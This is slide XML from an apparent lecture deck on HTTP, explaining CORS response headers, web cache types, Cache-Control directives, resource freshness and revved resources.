          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2862757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HTTP response headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8686800" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP response headers that servers send back for access control requests as defined by the Cross-Origin Resource Sharing specification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>specifies a URI that may access the resource. For requests without credentials, the server may specify "*" as a wildcard, thereby allowing any origin to access the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>resource. For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>example, to allow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>mozilla.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> as origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to access the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>resource in another domain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>you can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>specify: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Access-Control-Allow-Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: http://mozilla.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Expose-Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> lets a server whitelist headers that browsers are allowed to access. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access-Control-Expose-Headers: X-My-Custom-Header, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>X-Another-Custom-Header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Max-Age</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>indicates how long the results of a preflight request can be cached. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:  Indicates whether or not the response to the request can be exposed when the credentials flag is true.  When used as part of a response to a preflight request, this indicates whether or not the actual request can be made using credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Methods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: specifies the method or methods allowed when accessing the resource. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: used in response to a preflight request to indicate which HTTP headers can be used when making the actual request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2812398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HTTP caching</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8686800" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The performance of web sites and applications can be significantly improved by reusing previously fetched resources. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caching is a technique that stores a copy of a given resource and serves it back when requested. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a web cache has a requested resource in its store, it intercepts the request and returns its copy instead of re-downloading from the originating server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>caches reduce latency and network traffic and thus lessen the time needed to display a representation of a resource. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web cache also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>eases the load of the server that doesn’t need to serve all clients itself</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>making use of HTTP caching, Web sites become more responsive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>has to be configured properly as not all resources stay identical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>forever</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is important to cache a resource only until it changes, not longer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4191843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Caches types</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A private </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>browser cache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is dedicated to a single user. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>might have seen "caching" in your browser's settings already. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>browser cache holds all documents downloaded via HTTP by the user. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cache is used to make visited documents available for back/forward navigation, saving, viewing-as-source, etc. without requiring an additional trip to the server. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>likewise improves offline browsing of cached content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" smtClean="0"/>
              <a:t>Shared proxy caches:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A shared cache is a cache that stores responses to be reused by more than one user. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, an ISP or your company might have set up a web proxy as part of its local network infrastructure to serve many users so that popular resources are reused a number of times, reducing network traffic and latency.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3053099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Targets of caching operations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP caching is optional, but reusing a cached resource is usually desirable. However, common HTTP caches are typically limited to caching responses to GET and may decline other methods. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>primary cache key consists of the request method and target URI (oftentimes only the URI is used as only GET requests are caching targets). Common forms of caching entries are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Successful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>results of a retrieval request: a 200 (OK) response to a GET request containing a resource like HTML documents, images or files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Permanent redirects: a 301 (Moved Permanently) response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Error responses: a 404 (Not Found) result page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Incomplete results: a 206 (Partial Content) response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Responses other than GET if something suitable for use as a cache key is defined.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="924199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caching</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1219200"/>
            <a:ext cx="9144000" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cache-Control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> HTTP/1.1 general-header field is used to specify directives for caching mechanisms in both requests and responses. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use this header to define your caching policies with the variety of directives it provides.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No cache storage at all: The cache should not store anything about the client request or server response. A request is sent to the server and a full response is downloaded each and every time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cache-Control: no-store</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>No caching: A cache will send the request to the origin server for validation before releasing a cached copy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cache-Control: no-cache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Private and public caches: The "public" directive indicates that the response may be cached by any cache. "private" indicates that the response is intended for a single user only and must not be stored by a shared cache. A private browser cache may store the response in this case.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cache-Control: private</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Expiration:maximum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> amount of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>time (in seconds) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a resource will be considered fresh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cache-Control: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>max-age=31536000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Validation: the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cache must verify the status of the stale resources before using it and expired ones should not be used. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cache-Control: must-revalidate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2117360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Freshness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="3774"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2756254" y="-63500"/>
            <a:ext cx="6387746" cy="6959600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1219200"/>
            <a:ext cx="3048000" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once a resource is stored in a cache, it could theoretically be served by the cache forever. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Caches </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>have finite storage so items are periodically removed from storage. This process is called cache eviction. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP is a client-server protocol, servers can't contact caches and clients when a resource change; they have to communicate an expiration time for the resource. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Before </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>this expiration time, the resource is fresh; after its expiration time, the resource is stale. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33480096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 y="6263"/>
            <a:ext cx="3227650" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Revved resources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="7174"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3227650" y="0"/>
            <a:ext cx="5916350" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="914400"/>
            <a:ext cx="3352800" cy="5943600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>•The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>more we use cached resources, the better the responsiveness and the performance of a Web site </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>•Good </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>practices recommend to set expiration times </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>far </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>future</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>•This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>problematic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for resources that are rarely and infrequently updated. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>•They </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
